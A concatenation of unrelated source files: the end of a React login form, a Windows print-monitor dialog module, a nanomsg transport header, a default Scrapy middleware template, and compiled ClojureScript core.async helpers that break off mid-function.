icon="sign in"
type="submit"
color="black"
content="Log in"
/>
</Segment>
</Form>
<Message attached="bottom" warning>
<Icon name="help" />
New user?
<Link href={signupLink}>
<a>Sign up here</a>
</Link>
instead
</Message>
</Container>
);
LoginForm.propTypes = {
user: PropTypes.shape({
email: PropTypes.string.isRequired,
password: PropTypes.string.isRequired,
}).isRequired,
loading: PropTypes.bool.isRequired,
disabled: PropTypes.bool.isRequired,
error: PropTypes.string.isRequired,
signupLink: PropTypes.string.isRequired,
handleChange: PropTypes.func.isRequired,
handleSubmit: PropTypes.func.isRequired,
};
export default LoginForm;
|
/*++
Copyright (c) 1990-2003 Microsoft Corporation
All rights reserved
Module Name:
dialogs.c
// @@BEGIN_DDKSPLIT
Abstract:
Environment:
User Mode -Win32
Revision History:
// @@END_DDKSPLIT
--*/
#include "precomp.h"
#pragma hdrstop
#include "spltypes.h"
#include "localui.h"
#include "local.h"
#include "dialogs.h"
WCHAR szINIKey_TransmissionRetryTimeout[] = L"TransmissionRetryTimeout";
WCHAR szHelpFile[] = L"WINDOWS.HLP";
#define MAX_LOCAL_PORTNAME 246
const DWORD g_aHelpIDs[]=
{
IDD_PN_EF_PORTNAME, 8805136, // Port Name: "" (Edit)
IDD_CL_EF_TRANSMISSIONRETRY, 8807704, // Configure LPT Port: "" (Edit)
0, 0
};
INT_PTR APIENTRY
ConfigureLPTPortDlg(
HWND hwnd,
UINT msg,
WPARAM wparam,
LPARAM lparam
)
{
switch(msg)
{
case WM_INITDIALOG:
return ConfigureLPTPortInitDialog(hwnd, (PPORTDIALOG) lparam);
case WM_COMMAND:
switch (LOWORD(wparam))
{
case IDOK:
return ConfigureLPTPortCommandOK(hwnd);
case IDCANCEL:
return ConfigureLPTPortCommandCancel(hwnd);
case IDD_CL_EF_TRANSMISSIONRETRY:
if( HIWORD(wparam) == EN_UPDATE )
ConfigureLPTPortCommandTransmissionRetryUpdate(hwnd, LOWORD(wparam));
break;
}
break;
case WM_HELP:
case WM_CONTEXTMENU:
return LocalUIHelp(hwnd, msg, wparam, lparam);
break;
}
return FALSE;
}
/*
*
*/
BOOL
ConfigureLPTPortInitDialog(
HWND hwnd,
PPORTDIALOG pPort
)
{
DWORD dwTransmissionRetryTimeout;
DWORD cbNeeded;
DWORD dwDummy;
BOOL rc;
DWORD dwStatus;
SetWindowLongPtr(hwnd, GWLP_USERDATA, (LONG_PTR) pPort);
SetForegroundWindow(hwnd);
SendDlgItemMessage( hwnd, IDD_CL_EF_TRANSMISSIONRETRY,
EM_LIMITTEXT, TIMEOUT_STRING_MAX, 0 );
// Get the Transmission Retry Timeout from the host
rc = XcvData( pPort->hXcv,
L"GetTransmissionRetryTimeout",
(PBYTE) &dwDummy,
0,
(PBYTE) &dwTransmissionRetryTimeout,
sizeof dwTransmissionRetryTimeout,
&cbNeeded,
&dwStatus);
if(!rc) {
DBGMSG(DBG_WARNING, ("Error %d checking TransmissionRetryTimeout\n", GetLastError()));
} else if(dwStatus != ERROR_SUCCESS) {
DBGMSG(DBG_WARNING, ("Error %d checking TransmissionRetryTimeout\n", dwStatus));
SetLastError(dwStatus);
rc = FALSE;
} else {
SetDlgItemInt( hwnd, IDD_CL_EF_TRANSMISSIONRETRY,
dwTransmissionRetryTimeout, FALSE );
SET_LAST_VALID_ENTRY( hwnd, IDD_CL_EF_TRANSMISSIONRETRY,
dwTransmissionRetryTimeout );
}
return rc;
}
/*
*
*/
BOOL
ConfigureLPTPortCommandOK(
HWND hwnd
)
{
WCHAR String[TIMEOUT_STRING_MAX+1];
UINT TransmissionRetryTimeout;
BOOL b;
DWORD cbNeeded;
PPORTDIALOG pPort;
DWORD dwStatus;
if ((pPort = (PPORTDIALOG) GetWindowLongPtr(hwnd, GWLP_USERDATA)) == NULL)
{
dwStatus = ERROR_INVALID_DATA;
ErrorMessage (hwnd, dwStatus);
SetLastError (dwStatus);
return FALSE;
}
TransmissionRetryTimeout = GetDlgItemInt( hwnd,
IDD_CL_EF_TRANSMISSIONRETRY,
&b,
FALSE );
StringCchPrintf (String, COUNTOF (String), L"%d", TransmissionRetryTimeout);
b = XcvData(pPort->hXcv,
L"ConfigureLPTPortCommandOK",
(PBYTE) String,
(wcslen(String) + 1)*sizeof(WCHAR),
(PBYTE) &cbNeeded,
0,
&cbNeeded,
&dwStatus);
EndDialog(hwnd, b ? dwStatus : GetLastError());
return TRUE;
}
/*
*
*/
BOOL
ConfigureLPTPortCommandCancel(
HWND hwnd
)
{
EndDialog(hwnd, ERROR_CANCELLED);
return TRUE;
}
/*
*
*/
BOOL
ConfigureLPTPortCommandTransmissionRetryUpdate(
HWND hwnd,
WORD CtlId
)
{
int Value;
BOOL OK;
Value = GetDlgItemInt( hwnd, CtlId, &OK, FALSE );
if( WITHINRANGE( Value, TIMEOUT_MIN, TIMEOUT_MAX ) )
{
SET_LAST_VALID_ENTRY( hwnd, CtlId, Value );
}
else
{
SetDlgItemInt( hwnd, CtlId, (UINT) GET_LAST_VALID_ENTRY( hwnd, CtlId ), FALSE );
SendDlgItemMessage( hwnd, CtlId, EM_SETSEL, 0, (LPARAM)-1 );
}
return TRUE;
}
/*
*
*/
INT_PTR CALLBACK
PortNameDlg(
HWND hwnd,
WORD msg,
WPARAM wparam,
LPARAM lparam
)
{
switch(msg)
{
case WM_INITDIALOG:
return PortNameInitDialog(hwnd, (PPORTDIALOG)lparam);
case WM_COMMAND:
switch (LOWORD(wparam))
{
case IDOK:
return PortNameCommandOK(hwnd);
case IDCANCEL:
return PortNameCommandCancel(hwnd);
}
break;
case WM_HELP:
case WM_CONTEXTMENU:
return LocalUIHelp(hwnd, msg, wparam, lparam);
}
return FALSE;
}
/*
*
*/
BOOL
PortNameInitDialog(
HWND hwnd,
PPORTDIALOG pPort
)
{
SetForegroundWindow(hwnd);
SetWindowLongPtr(hwnd, GWLP_USERDATA, (LONG_PTR) pPort);
// Number used to check port length in LocalMon (247)
SendDlgItemMessage (hwnd, IDD_PN_EF_PORTNAME, EM_LIMITTEXT, MAX_LOCAL_PORTNAME, 0);
return TRUE;
}
/*
*
*/
BOOL
PortNameCommandOK(
HWND hwnd
)
{
PPORTDIALOG pPort;
WCHAR string [MAX_LOCAL_PORTNAME + 1];
BOOL rc;
DWORD cbNeeded;
DWORD dwStatus;
if ((pPort = (PPORTDIALOG) GetWindowLongPtr( hwnd, GWLP_USERDATA )) == NULL)
{
dwStatus = ERROR_INVALID_DATA;
ErrorMessage (hwnd, dwStatus);
SetLastError (dwStatus);
return FALSE;
}
GetDlgItemText( hwnd, IDD_PN_EF_PORTNAME, string, COUNTOF (string) );
rc = XcvData( pPort->hXcv,
L"PortIsValid",
(PBYTE) string,
(wcslen(string) + 1)*sizeof *string,
(PBYTE) NULL,
0,
&cbNeeded,
&dwStatus);
if (!rc) {
return FALSE;
} else if (dwStatus != ERROR_SUCCESS) {
SetLastError(dwStatus);
if (dwStatus == ERROR_INVALID_NAME)
Message( hwnd, MSG_ERROR, IDS_LOCALMONITOR, IDS_INVALIDPORTNAME_S, string );
else
ErrorMessage(hwnd, dwStatus);
return FALSE;
} else {
pPort->pszPortName = AllocSplStr( string );
EndDialog( hwnd, ERROR_SUCCESS );
return TRUE;
}
}
/*
*
*/
BOOL
PortNameCommandCancel(
HWND hwnd
)
{
EndDialog(hwnd, ERROR_CANCELLED);
return TRUE;
}
/*++
Routine Name:
LocalUIHelp
Routine Description:
Handles context sensitive help for the configure LPTX:
port and the dialog for adding a local port.
Arguments:
UINT uMsg,
HWND hDlg,
WPARAM wParam,
LPARAM lParam
Return Value:
TRUE if message handled, otherwise FALSE.
--*/
BOOL
LocalUIHelp(
IN HWND hDlg,
IN UINT uMsg,
IN WPARAM wParam,
IN LPARAM lParam
)
{
BOOL bStatus = FALSE;
switch( uMsg ){
case WM_HELP:
bStatus = WinHelp((HWND)((LPHELPINFO)lParam)->hItemHandle,
szHelpFile,
HELP_WM_HELP,
(ULONG_PTR)g_aHelpIDs );
break;
case WM_CONTEXTMENU:
bStatus = WinHelp((HWND)wParam,
szHelpFile,
HELP_CONTEXTMENU,
(ULONG_PTR)g_aHelpIDs );
break;
}
return bStatus;
}
|
#ifndef NN_TRANSPORT_INCLUDED
#define NN_TRANSPORT_INCLUDED
#include "nn.h"
#include "aio/fsm.h"
#include "utils/list.h"
#include "utils/msg.h"
#include <stddef.h>
struct nn_sock;
struct nn_optset;
struct nn_optset_vfptr {
void (*destroy)(struct nn_optset *self);
int (*setopt)(struct nn_optset *self, int option, const void *optval,
size_t optvallen);
int (*getopt)(
struct nn_optset *self, int option, void *optval, size_t *optvallen);
};
struct nn_optset {
const struct nn_optset_vfptr *vfptr;
};
struct nn_ep;
struct nn_ep_ops {
void (*stop)(void *);
void (*destroy)(void *);
};
void nn_ep_tran_setup(struct nn_ep *, const struct nn_ep_ops *, void *);
void nn_ep_stopped(struct nn_ep *);
struct nn_ctx *nn_ep_getctx(struct nn_ep *);
const char *nn_ep_getaddr(struct nn_ep *self);
void nn_ep_getopt(
struct nn_ep *, int level, int option, void *optval, size_t *optvallen);
int nn_ep_ispeer(struct nn_ep *, int socktype);
int nn_ep_ispeer_ep(struct nn_ep *, struct nn_ep *);
void nn_ep_set_error(struct nn_ep *, int errnum);
void nn_ep_clear_error(struct nn_ep *);
void nn_ep_stat_increment(struct nn_ep *, int name, int increment);
struct nn_pipebase;
#define NN_PIPEBASE_RELEASE (1)
#define NN_PIPEBASE_PARSED (2)
struct nn_pipebase_vfptr {
int (*send)(struct nn_pipebase *self, struct nn_msg *msg);
int (*recv)(struct nn_pipebase *self, struct nn_msg *msg);
};
struct nn_ep_options {
int sndprio;
int rcvprio;
int ipv4only;
};
struct nn_pipebase {
struct nn_fsm fsm;
const struct nn_pipebase_vfptr *vfptr;
uint8_t state;
uint8_t instate;
uint8_t outstate;
struct nn_sock *sock;
void *data;
struct nn_fsm_event in;
struct nn_fsm_event out;
struct nn_ep_options options;
};
void nn_pipebase_init(struct nn_pipebase *self,
const struct nn_pipebase_vfptr *vfptr, struct nn_ep *ep);
void nn_pipebase_term(struct nn_pipebase *self);
int nn_pipebase_start(struct nn_pipebase *self);
void nn_pipebase_stop(struct nn_pipebase *self);
void nn_pipebase_received(struct nn_pipebase *self);
void nn_pipebase_sent(struct nn_pipebase *self);
void nn_pipebase_getopt(struct nn_pipebase *self, int level, int option,
void *optval, size_t *optvallen);
int nn_pipebase_ispeer(struct nn_pipebase *self, int socktype);
struct nn_transport {
const char *name;
int id;
void (*init)(void);
void (*term)(void);
int (*bind)(struct nn_ep *);
int (*connect)(struct nn_ep *);
struct nn_optset *(*optset)(void);
};
#endif // !NN_TRANSPORT_INCLUDED
|
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class Proj2081SpiderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, or item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request or item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class Proj2081DownloaderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
|
goog.provide('cljs.core.async.impl.ioc_helpers');
goog.require('cljs.core');
goog.require('cljs.core.async.impl.protocols');
cljs.core.async.impl.ioc_helpers.FN_IDX = (0);
cljs.core.async.impl.ioc_helpers.STATE_IDX = (1);
cljs.core.async.impl.ioc_helpers.VALUE_IDX = (2);
cljs.core.async.impl.ioc_helpers.BINDINGS_IDX = (3);
cljs.core.async.impl.ioc_helpers.EXCEPTION_FRAMES = (4);
cljs.core.async.impl.ioc_helpers.CURRENT_EXCEPTION = (5);
cljs.core.async.impl.ioc_helpers.USER_START_IDX = (6);
cljs.core.async.impl.ioc_helpers.aset_object = (function cljs$core$async$impl$ioc_helpers$aset_object(arr,idx,o){
return (arr[idx][o]);
});
cljs.core.async.impl.ioc_helpers.aget_object = (function cljs$core$async$impl$ioc_helpers$aget_object(arr,idx){
return (arr[idx]);
});
/**
* Returns true if the machine is in a finished state
*/
cljs.core.async.impl.ioc_helpers.finished_QMARK_ = (function cljs$core$async$impl$ioc_helpers$finished_QMARK_(state_array){
return cljs.core.keyword_identical_QMARK_((state_array[(1)]),new cljs.core.Keyword(null,"finished","finished",-1018867731));
});
cljs.core.async.impl.ioc_helpers.fn_handler = (function cljs$core$async$impl$ioc_helpers$fn_handler(f){
if((typeof cljs !== 'undefined') && (typeof cljs.core !== 'undefined') && (typeof cljs.core.async !== 'undefined') && (typeof cljs.core.async.impl !== 'undefined') && (typeof cljs.core.async.impl.ioc_helpers !== 'undefined') && (typeof cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374 !== 'undefined')){
} else {
/**
* @constructor
* @implements {cljs.core.async.impl.protocols.Handler}
* @implements {cljs.core.IMeta}
* @implements {cljs.core.IWithMeta}
*/
cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374 = (function (f,meta29375){
this.f = f;
this.meta29375 = meta29375;
this.cljs$lang$protocol_mask$partition0$ = 393216;
this.cljs$lang$protocol_mask$partition1$ = 0;
});
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$IWithMeta$_with_meta$arity$2 = (function (_29376,meta29375__$1){
var self__ = this;
var _29376__$1 = this;
return (new cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374(self__.f,meta29375__$1));
}));
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$IMeta$_meta$arity$1 = (function (_29376){
var self__ = this;
var _29376__$1 = this;
return self__.meta29375;
}));
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$ = cljs.core.PROTOCOL_SENTINEL);
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$active_QMARK_$arity$1 = (function (_){
var self__ = this;
var ___$1 = this;
return true;
}));
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$blockable_QMARK_$arity$1 = (function (_){
var self__ = this;
var ___$1 = this;
return true;
}));
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$commit$arity$1 = (function (_){
var self__ = this;
var ___$1 = this;
return self__.f;
}));
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.getBasis = (function (){
return new cljs.core.PersistentVector(null, 2, 5, cljs.core.PersistentVector.EMPTY_NODE, [new cljs.core.Symbol(null,"f","f",43394975,null),new cljs.core.Symbol(null,"meta29375","meta29375",-1267248991,null)], null);
}));
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.cljs$lang$type = true);
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.cljs$lang$ctorStr = "cljs.core.async.impl.ioc-helpers/t_cljs$core$async$impl$ioc_helpers29374");
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.cljs$lang$ctorPrWriter = (function (this__4428__auto__,writer__4429__auto__,opt__4430__auto__){
return cljs.core._write(writer__4429__auto__,"cljs.core.async.impl.ioc-helpers/t_cljs$core$async$impl$ioc_helpers29374");
}));
/**
* Positional factory function for cljs.core.async.impl.ioc-helpers/t_cljs$core$async$impl$ioc_helpers29374.
*/
cljs.core.async.impl.ioc_helpers.__GT_t_cljs$core$async$impl$ioc_helpers29374 = (function cljs$core$async$impl$ioc_helpers$fn_handler_$___GT_t_cljs$core$async$impl$ioc_helpers29374(f__$1,meta29375){
return (new cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374(f__$1,meta29375));
});
}
return (new cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374(f,cljs.core.PersistentArrayMap.EMPTY));
});
cljs.core.async.impl.ioc_helpers.run_state_machine = (function cljs$core$async$impl$ioc_helpers$run_state_machine(state){
var fexpr__29397 = cljs.core.async.impl.ioc_helpers.aget_object(state,(0));
return (fexpr__29397.cljs$core$IFn$_invoke$arity$1 ? fexpr__29397.cljs$core$IFn$_invoke$arity$1(state) : fexpr__29397.call(null,state));
});
cljs.core.async.impl.ioc_helpers.run_state_machine_wrapped = (function cljs$core$async$impl$ioc_helpers$run_state_machine_wrapped(state){
try{return cljs.core.async.impl.ioc_helpers.run_state_machine(state);
}catch (e29398){if((e29398 instanceof Object)){
var ex = e29398;
cljs.core.async.impl.ioc_helpers.aget_object(state,(6)).cljs$core$async$impl$protocols$Channel$close_BANG_$arity$1(null);
throw ex;
} else {
throw e29398;
}
}});
cljs.core.async.impl.ioc_helpers.take_BANG_ = (function cljs$core$async$impl$ioc_helpers$take_BANG_(state,blk,c){
var temp__5733__auto__ = c.cljs$core$async$impl$protocols$ReadPort$take_BANG_$arity$2(null,cljs.core.async.impl.ioc_helpers.fn_handler((function (x){
var statearr_29405_29512 = state;
(statearr_29405_29512[(2)] = x);
(statearr_29405_29512[(1)] = blk);
return cljs.core.async.impl.ioc_helpers.run_state_machine_wrapped(state);
})));
if(cljs.core.truth_(temp__5733__auto__)){
var cb = temp__5733__auto__;
var statearr_29413_29517 = state;
(statearr_29413_29517[(2)] = cljs.core.deref(cb));
(statearr_29413_29517[(1)] = blk);
return new cljs.core.Keyword(null,"recur","recur",-437573268);
} else {
return null;
}
});
cljs.core.async.impl.ioc_helpers.put_BANG_ = (function cljs$core$async$impl$ioc_helpers$put_BANG_(state,blk,c,val){
var temp__5733__auto__ = c.cljs$core$async$impl$protocols$WritePort$put_BANG_$arity$3(null,val,cljs.core.async.impl.ioc_helpers.fn_handler((function (ret_val){
var statearr_29423_29521 = state;
(statearr_29423_29521[(2)] = ret_val);
(statearr_29423_29521[(1)] = blk);
return cljs.core.async.impl.ioc_helpers.run_state_machine_wrapped(state);
})));
if(cljs.core.truth_(temp__5733__auto__)){
var cb = temp__5733__auto__;
var statearr_29424_29522 = state;
(statearr_29424_29522[(2)] = cljs.core.deref(cb));
(statearr_29424_29522[(1)] = blk);
return new cljs.core.Keyword(null,"recur","recur",-437573268);
} else {
return null;
}
});
cljs.core.async.impl.ioc_helpers.return_chan = (function cljs$core$async$impl$ioc_helpers$return_chan(state,value){
var c = (state[(6)]);
if((value == null)){
} else {
c.cljs$core$async$impl$protocols$WritePort$put_BANG_$arity$3(null,value,cljs.core.async.impl.ioc_helpers.fn_handler((function (){
return null;
})));
}
c.cljs$core$async$impl$protocols$Channel$close_BANG_$arity$1(null);
return c;
});
/**
* @constructor
* @implements {cljs.core.IRecord}
* @implements {cljs.core.IKVReduce}
* @implements {cljs.core.IEquiv}
* @implements {cljs.core.IHash}
* @implements {cljs.core.ICollection}
* @implements {cljs.core.ICounted}
* @implements {cljs.core.ISeqable}
* @implements {cljs.core.IMeta}
* @implements {cljs.core.ICloneable}
* @implements {cljs.core.IPrintWithWriter}
* @implements {cljs.core.IIterable}
* @implements {cljs.core.IWithMeta}
* @implements {cljs.core.IAssociative}
* @implements {cljs.core.IMap}
* @implements {cljs.core.ILookup}
*/
cljs.core.async.impl.ioc_helpers.ExceptionFrame = (function (catch_block,catch_exception,finally_block,continue_block,prev,__meta,__extmap,__hash){
this.catch_block = catch_block;
this.catch_exception = catch_exception;
this.finally_block = finally_block;
this.continue_block = continue_block;
this.prev = prev;
this.__meta = __meta;
this.__extmap = __extmap;
this.__hash = __hash;
this.cljs$lang$protocol_mask$partition0$ = 2230716170;
this.cljs$lang$protocol_mask$partition1$ = 139264;
});
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ILookup$_lookup$arity$2 = (function (this__4439__auto__,k__4440__auto__){
var self__ = this;
var this__4439__auto____$1 = this;
return this__4439__auto____$1.cljs$core$ILookup$_lookup$arity$3(null,k__4440__auto__,null);
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ILookup$_lookup$arity$3 = (function (this__4441__auto__,k29432,else__4442__auto__){
var self__ = this;
var this__4441__auto____$1 = this;
var G__29448 = k29432;
var G__29448__$1 = (((G__29448 instanceof cljs.core.Keyword))?G__29448.fqn:null);
switch (G__29448__$1) {
case "catch-block":
return self__.catch_block;
break;
case "catch-exception":
return self__.catch_exception;
break;
case "finally-block":
return self__.finally_block;
break;
case "continue-block":
return self__.continue_block;
break;
case "prev":
return self__.prev;
break;
default:
return cljs.core.get.cljs$core$IFn$_invoke$arity$3(self__.__extmap,k29432,else__4442__auto__);
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IKVReduce$_kv_reduce$arity$3 = (function (this__4458__auto__,f__4459__auto__,init__4460__auto__){
var self__ = this;
var this__4458__auto____$1 = this;
return cljs.core.reduce.cljs$core$IFn$_invoke$arity$3((function (ret__4461__auto__,p__29450){
var vec__29451 = p__29450;
var k__4462__auto__ = cljs.core.nth.cljs$core$IFn$_invoke$arity$3(vec__29451,(0),null);
var v__4463__auto__ = cljs.core.nth.cljs$core$IFn$_invoke$arity$3(vec__29451,(1),null);
return (f__4459__auto__.cljs$core$IFn$_invoke$arity$3 ? f__4459__auto__.cljs$core$IFn$_invoke$arity$3(ret__4461__auto__,k__4462__auto__,v__4463__auto__) : f__4459__auto__.call(null,ret__4461__auto__,k__4462__auto__,v__4463__auto__));
}),init__4460__auto__,this__4458__auto____$1);
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IPrintWithWriter$_pr_writer$arity$3 = (function (this__4453__auto__,writer__4454__auto__,opts__4455__auto__){
var self__ = this;
var this__4453__auto____$1 = this;
var pr_pair__4456__auto__ = (function (keyval__4457__auto__){
return cljs.core.pr_sequential_writer(writer__4454__auto__,cljs.core.pr_writer,""," ","",opts__4455__auto__,keyval__4457__auto__);
});
return cljs.core.pr_sequential_writer(writer__4454__auto__,pr_pair__4456__auto__,"#cljs.core.async.impl.ioc-helpers.ExceptionFrame{",", ","}",opts__4455__auto__,cljs.core.concat.cljs$core$IFn$_invoke$arity$2(new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),self__.catch_block],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),self__.catch_exception],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"finally-block","finally-block",832982472),self__.finally_block],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),self__.continue_block],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"prev","prev",-1597069226),self__.prev],null))], null),self__.__extmap));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IIterable$_iterator$arity$1 = (function (G__29431){
var self__ = this;
var G__29431__$1 = this;
return (new cljs.core.RecordIter((0),G__29431__$1,5,new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),new cljs.core.Keyword(null,"finally-block","finally-block",832982472),new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),new cljs.core.Keyword(null,"prev","prev",-1597069226)], null),(cljs.core.truth_(self__.__extmap)?cljs.core._iterator(self__.__extmap):cljs.core.nil_iter())));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IMeta$_meta$arity$1 = (function (this__4437__auto__){
var self__ = this;
var this__4437__auto____$1 = this;
return self__.__meta;
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ICloneable$_clone$arity$1 = (function (this__4434__auto__){
var self__ = this;
var this__4434__auto____$1 = this;
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,self__.__hash));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ICounted$_count$arity$1 = (function (this__4443__auto__){
var self__ = this;
var this__4443__auto____$1 = this;
return (5 + cljs.core.count(self__.__extmap));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IHash$_hash$arity$1 = (function (this__4435__auto__){
var self__ = this;
var this__4435__auto____$1 = this;
var h__4297__auto__ = self__.__hash;
if((!((h__4297__auto__ == null)))){
return h__4297__auto__;
} else {
var h__4297__auto____$1 = (function (coll__4436__auto__){
return (846900531 ^ cljs.core.hash_unordered_coll(coll__4436__auto__));
})(this__4435__auto____$1);
(self__.__hash = h__4297__auto____$1);
return h__4297__auto____$1;
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IEquiv$_equiv$arity$2 = (function (this29433,other29434){
var self__ = this;
var this29433__$1 = this;
return (((!((other29434 == null)))) && ((this29433__$1.constructor === other29434.constructor)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.catch_block,other29434.catch_block)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.catch_exception,other29434.catch_exception)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.finally_block,other29434.finally_block)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.continue_block,other29434.continue_block)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.prev,other29434.prev)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.__extmap,other29434.__extmap)));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IMap$_dissoc$arity$2 = (function (this__4448__auto__,k__4449__auto__){
var self__ = this;
var this__4448__auto____$1 = this;
if(cljs.core.contains_QMARK_(new cljs.core.PersistentHashSet(null, new cljs.core.PersistentArrayMap(null, 5, [new cljs.core.Keyword(null,"finally-block","finally-block",832982472),null,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),null,new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),null,new cljs.core.Keyword(null,"prev","prev",-1597069226),null,new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),null], null), null),k__4449__auto__)){
return cljs.core.dissoc.cljs$core$IFn$_invoke$arity$2(cljs.core._with_meta(cljs.core.into.cljs$core$IFn$_invoke$arity$2(cljs.core.PersistentArrayMap.EMPTY,this__4448__auto____$1),self__.__meta),k__4449__auto__);
} else {
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,cljs.core.not_empty(cljs.core.dissoc.cljs$core$IFn$_invoke$arity$2(self__.__extmap,k__4449__auto__)),null));
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IAssociative$_assoc$arity$3 = (function (this__4446__auto__,k__4447__auto__,G__29431){
var self__ = this;
var this__4446__auto____$1 = this;
var pred__29460 = cljs.core.keyword_identical_QMARK_;
var expr__29461 = k__4447__auto__;
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),expr__29461)))){
